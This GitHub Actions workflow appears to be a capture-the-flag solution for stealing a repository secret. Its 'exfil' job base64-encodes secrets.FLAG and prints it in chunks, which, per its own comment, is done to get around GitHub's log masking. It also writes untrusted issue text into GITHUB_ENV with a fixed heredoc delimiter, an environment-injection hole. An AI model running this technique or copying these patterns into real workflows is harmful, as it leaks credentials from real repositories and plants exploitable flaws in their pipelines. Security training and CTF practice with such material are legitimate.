name: 'GitHub Actions just works'

on:
  issues:

jobs:
  exfil:
    runs-on: ubuntu-24.04
    steps:
      - name: Save issue body safely
        env:
            BODY: ${{ github.event.issue.body }}
            TITLE: ${{ github.event.issue.title }}
        run: |
          echo "ISSUE_TITLE=$(echo "$TITLE" | tr '\n' ' ')" >> $GITHUB_ENV
          printf "ISSUE_BODY<<EOF\n%s\nEOF\n" "$BODY" >> $GITHUB_ENV

      - name: Exfil FLAG (base64 chunked)
        shell: python
        env:
          FLAG: ${{ secrets.FLAG }}
        run: |
          import os, base64, textwrap
          flag = os.environ.get("FLAG","")
          b64 = base64.b64encode(flag.encode()).decode()
          print("B64_FLAG_START")
            # Découpage en chunks pour lisibilité / contournement masquage
          for chunk in textwrap.wrap(b64, 32):
              print("CHUNK", chunk)
          print("B64_FLAG_END")

      - name: Original demo
        shell: python
        run: print(40+2)
